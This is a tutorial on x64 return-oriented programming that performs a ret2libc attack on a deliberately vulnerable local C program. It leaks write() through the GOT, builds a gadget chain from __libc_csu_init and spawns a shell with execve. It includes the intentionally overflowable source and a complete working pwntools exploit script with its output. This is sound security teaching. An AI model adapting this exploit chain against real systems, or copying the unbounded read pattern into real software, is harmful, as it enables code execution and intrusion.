Intro

In the previous article, we covered parameter passing conventions for both x86 and x64 architectures, and performed a basic ROP attack on an x86 binary. This time, let’s take the plunge into x64 territory—performing a ret2libc attack using only libc functions, without any helper functions in the binary. This is the final exercise from the “Step by Step ROP” x64 series.

Source Code

#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void vulnerable_function() {
        char buf[128];
        read(STDIN_FILENO, buf, 512);
}

int main(int argc, char** argv) {
        write(STDOUT_FILENO, "Hello, World\n", 13);
        vulnerable_function();
}

The exploitable vulnerability in vulnerable_function is obvious: the buffer overflow. The overflow offset is at 136 bytes (see the previous article for how to find it). Compilation flags:

$ gcc -fno-stack-protector -no-pie level5.c -o level5

Inspecting the binary confirms it links against libc:

➜  linux_x64 git:(master) ✗ checksec ./level5                
[*] '/home/ya0guang/Code_obo/ROP_STEP_BY_STEP/linux_x64/level5'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
➜  linux_x64 git:(master) ✗ readelf -d ./level5 | grep Shared
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]

Overview

Our strategy: call system("/bin/sh") or execve("/bin/sh") to spawn a shell. We need to find libc’s runtime base address and a “/bin/sh” string in memory. While we can’t directly obtain libc’s base, we can leak the runtime address of write() using the GOT (Global Offset Table). The function signature:

ssize_t write(int fd, const void *buf, size_t count);

We’ll make write() print its own GOT entry address, giving us write()’s runtime address. Viewing the relocation table:

➜  linux_x64 git:(master) ✗ objdump -R level5

level5:     file format elf64-x86-64

DYNAMIC RELOCATION RECORDS
OFFSET           TYPE              VALUE 
0000000000403fe0 R_X86_64_GLOB_DAT  _ITM_deregisterTMCloneTable
0000000000403fe8 R_X86_64_GLOB_DAT  __libc_start_main@GLIBC_2.2.5
0000000000403ff0 R_X86_64_GLOB_DAT  __gmon_start__
0000000000403ff8 R_X86_64_GLOB_DAT  _ITM_registerTMCloneTable
0000000000404018 R_X86_64_JUMP_SLOT  write@GLIBC_2.2.5
0000000000404020 R_X86_64_JUMP_SLOT  read@GLIBC_2.2.5

Both write and read are in the GOT. For an excellent GOT/PLT primer, see this series.

Since we have libc’s binary, we know write()’s offset within it. Combining the runtime address and the offset gives us libc’s base, from which we can derive system() or execve().

Next, we need a “/bin/sh” string. We’ll use read() to write “/bin/sh\0” into the BSS segment (a writable memory section).

Finally, call execve(). (For reasons I never figured out, calling system() consistently failed in my environment—if anyone knows why, I’d love to hear!)

Payload

Since x64 uses registers for parameter passing, we can’t just push arguments onto the stack. We need ROP gadgets like pop rdi/rsi/rdx. Disassembling __libc_csu_init reveals two useful gadgets:

  • gadget_call: Moves r14→rdx, r13→rsi, r12d→edi, then calls [r15+rbx*8]
  4011d0:       4c 89 f2                mov    %r14,%rdx
  4011d3:       4c 89 ee                mov    %r13,%rsi
  4011d6:       44 89 e7                mov    %r12d,%edi
  4011d9:       41 ff 14 df             callq  *(%r15,%rbx,8)
  • gadget_pop: Pops stack values into registers
  4011ea:       5b                      pop    %rbx
  4011eb:       5d                      pop    %rbp
  4011ec:       41 5c                   pop    %r12
  4011ee:       41 5d                   pop    %r13
  4011f0:       41 5e                   pop    %r14
  4011f2:       41 5f                   pop    %r15
  4011f4:       c3                      retq  

The popped values feed directly into the parameter registers used by the call! Our ROP chain: load the function address into r15, arguments into r12/r13/r14.

Stack Balance

After gadget_call, execution continues: rbx is incremented and compared against rbp. To avoid an unintended branch, we set rbp = rbx + 1 when popping. After the comparison, there are 7 more pops (including add rsp, 8), so we need (6+1)×8 = 56 bytes of padding before the next return address.

Exploit

The complete attack chain:

  1. Leak write()’s runtime address: overflow → ret to gadget_pop → ret to gadget_call: write(stdout, write_GOT, 8) → ret to main()
  2. Write “/bin/sh” and execve() address to BSS: overflow → ret to gadget_pop → ret to gadget_call: read(stdin, bss, 16) → ret to main(). Send: p64(execve_addr) + "/bin/sh\0"
  3. Call execve("/bin/sh"): overflow → ret to gadget_pop → ret to gadget_call: execve(bss+8) → ret to dummy

Exploit Script

from pwn import *

p = process("./level5")

elf = ELF('level5')
libc = elf.libc
bssAddr = elf.bss()
mainAddr = elf.symbols['main']

gadMovToReg = 0x4011d0
gadPopToReg = 0x4011ea
stackBalanceOffset = 56

writeGotAddr = elf.got['write']
readGotAddr = elf.got['read']

def genPayload( arg1, funcAddr, rbx = 0, rbp = 1, arg2 = 0, ret = mainAddr, arg3 = 0):
    payload = b'A' * 136 + p64(gadPopToReg) + p64(rbx) + p64(rbp) + p64(arg1) + p64(arg2) + p64(arg3) + p64(funcAddr)
    payload += p64(gadMovToReg) + b'A' * 56 +p64(ret)
    return payload

p.recvuntil("Hello, World\n")

# Step 1: Leak write() address
payload1 = genPayload(1, writeGotAddr, arg2 = writeGotAddr, arg3 = 8)
p.send(payload1)
sleep(1)

writeAddrInLibc = u64(p.recv(8))
print("[*] Write Addr in libc:", hex(writeAddrInLibc))

libc.address = writeAddrInLibc - libc.symbols['write']
print("[*] libc Addr:", libc.address)

systemAddr = libc.symbols['execve']
print("[*] execve Addr:", systemAddr)

p.recvuntil("Hello, World\n")

# Step 2: Write execve address + "/bin/sh" to BSS
payload2 = genPayload(0, readGotAddr, arg2 = bssAddr, arg3 = 16)
p.send(payload2)
print("[*] Sent Payload2")
sleep(1)

p.send(p64(systemAddr))
p.send("/bin/sh\0")
sleep(1)

p.recvuntil("Hello, World\n")

# Step 3: Call execve("/bin/sh")
payload3 = genPayload(bssAddr+8, bssAddr)
p.send(payload3)
print("[*] Sent Payload3")
sleep(1)
p.interactive()

Output:

➜  linux_x64 git:(master) ✗ python ./shellcode5.py
[+] Starting local process './level5': pid 11820
[*] Write Addr in libc: 0x7f4fef8d71e0
[*] libc Addr: 0x7f4fef7ea000
[*] execve Addr: 0x7f4fef8b3660
[*] Sent Payload2
[*] Sent Payload3
[*] Switching to interactive mode
$ whoami
ya0guang

Summary & Gadgets

If you’ve reproduced this successfully, congratulations—you’ve fallen into the binary exploitation rabbit hole, just like me. I was reading Reverse Engineering for Beginners (RE4B) at the time, which is an excellent assembly language reference if you want to go deeper.

One mystery I never solved: calling system() never returned a shell in my setup, while execve() worked perfectly. If anyone knows why, I’d appreciate the insight.

The same attack also consistently failed on my Ubuntu 18.04 physical machine. GDB debugging showed all addresses and arguments were correct, yet the shell never spawned. Quite frustrating—if you’ve encountered similar issues, please let me know.